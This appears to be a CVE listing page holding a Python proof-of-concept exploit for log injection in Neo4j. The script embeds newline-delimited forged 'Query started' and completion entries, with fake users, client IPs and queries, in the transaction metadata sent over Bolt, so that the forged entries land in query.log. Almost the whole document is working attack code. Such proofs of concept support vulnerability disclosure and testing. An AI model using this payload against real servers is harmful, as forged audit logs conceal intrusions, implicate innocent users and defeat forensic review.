4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / log_injection_poc.py PY
#!/usr/bin/env python3
"""
Log Injection Proof of Concept
==============================

Usage:
    python log_injection_poc.py [--uri URI] [--user USER] [--password PASS]
    
    python log_injection_poc.py --uri bolt://192.168.1.100:7687 --password secret
"""

import argparse
from datetime import datetime
from neo4j import GraphDatabase


def create_fake_query_started(timestamp: str, query_id: str, tx_id: str, 
                               client_ip: str, user: str, query: str, 
                               driver: str) -> str:
    """Create a fake 'Query started:' log entry."""
    return (
        f"{timestamp}+0000 INFO  Query started: id:{query_id} - transaction id:{tx_id} - "
        f"0 ms: (planning: 0, waiting: 0) - 0 B - 0 page hits, 0 page faults - "
        f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t"
        f"neo4j - {user} - {query} - {{}} - runtime=null - {{}}"
    )


def create_fake_completion(timestamp: str, query_id: str, tx_id: str, 
                           client_ip: str, user: str, query: str, 
                           driver: str, duration_ms: int = 1) -> str:
    """Create a fake query completion log entry."""
    return (
        f"{timestamp}+0000 INFO  id:{query_id} - transaction id:{tx_id} - "
        f"{duration_ms} ms: (planning: 0, waiting: 0) - 312 B - 1 page hits, 0 page faults - "
        f"bolt-session\tbolt\t{driver}\t\tclient/{client_ip}\tserver/127.0.0.1:7687>\t"
        f"neo4j - {user} - {query} - {{}} - runtime=pipelined - {{}}"
    )


def main():
    parser = argparse.ArgumentParser(description="Log Injection PoC - Clean Fake Entries")
    parser.add_argument("--uri", default="bolt://127.0.0.1:7687", 
                       help="Neo4j URI (default: bolt://127.0.0.1:7687)")
    parser.add_argument("--user", default="neo4j", help="Neo4j username (default: neo4j)")
    parser.add_argument("--password", default="password123", help="Neo4j password (default: password123)")
    args = parser.parse_args()
    
    print("="*40)
    print("LOG INJECTION PoC")
    print("="*40)
    print(f"Target: {args.uri}")
    print(f"User: {args.user}")
    print()
    

    timestamp = datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
    
    # Realistic driver string
    driver_string = "neo4j-python/6.0.3 Python/3.13.9-final-0 (linux)"
    
    # Multiple fake queries to inject - each with unique tx_id to avoid analyzer confusion
    fake_queries = [
        {
            "id": "700", "tx_id": "100", "ip": "10.0.0.1:1337",
            "user": "neo4j",
            "query": "MATCH (n:FakeQuery1) RETURN n LIMIT 1"
        },
        {
            "id": "701", "tx_id": "101", "ip": "192.168.1.50:4444",
            "user": "admin",
            "query": "MATCH (n:FakeQuery2) RETURN n LIMIT 1"
        },
    ]
    
    # Build payload with complete fake entries (both start and completion)
    # Real queries have: Query started + completion, so we inject both
    payload = "'\n"  # Close the quote from {x: ' and start new line
    
    # Add Query started entries
    for fq in fake_queries:
        payload += create_fake_query_started(
            timestamp, fq["id"], fq["tx_id"], fq["ip"], 
            fq["user"], fq["query"], driver_string
        ) + "\n"
    
    # Add completion entries (no newline after last one to minimize '} artifact)
    for i, fq in enumerate(fake_queries):
        entry = create_fake_completion(
            timestamp, fq["id"], fq["tx_id"], fq["ip"], 
            fq["user"], fq["query"], driver_string, duration_ms=i+1
        )
        if i < len(fake_queries) - 1:
            payload += entry + "\n"
        else:
            payload += entry  # Last entry - '} will append on same line
    
    print("Injecting fake log entries...")
    print("-" * 40)
    for fq in fake_queries:
        print(f"  • {fq['user']}@{fq['ip']}: {fq['query'][:50]}...")
    print("-" * 40)
    
    try:
        driver = GraphDatabase.driver(args.uri, auth=(args.user, args.password))
        
        # Query BEFORE injection (for comparison in logs) - real query 1
        with driver.session() as session:
            tx = session.begin_transaction()
            tx.run("MATCH (n:RealQuery) RETURN n LIMIT 1").consume()
            tx.commit()
            print("  Executed: MATCH (n:RealQuery) RETURN n LIMIT 1 (real)")
        
        # The injection query with fake log entries
        with driver.session() as session:
            tx = session.begin_transaction(metadata={"x": payload})
            tx.run("RETURN 1")
            tx.commit()
            print("  Executed: RETURN 1 (with injected fake entries)")
        
        driver.close()
        
        print()
        print("="*40)
        print("Check query.log")
        return 0
        
    except Exception as e:
        print(f"[ERROR] Failed: {e}")
        return 1


if __name__ == "__main__":
    exit(main())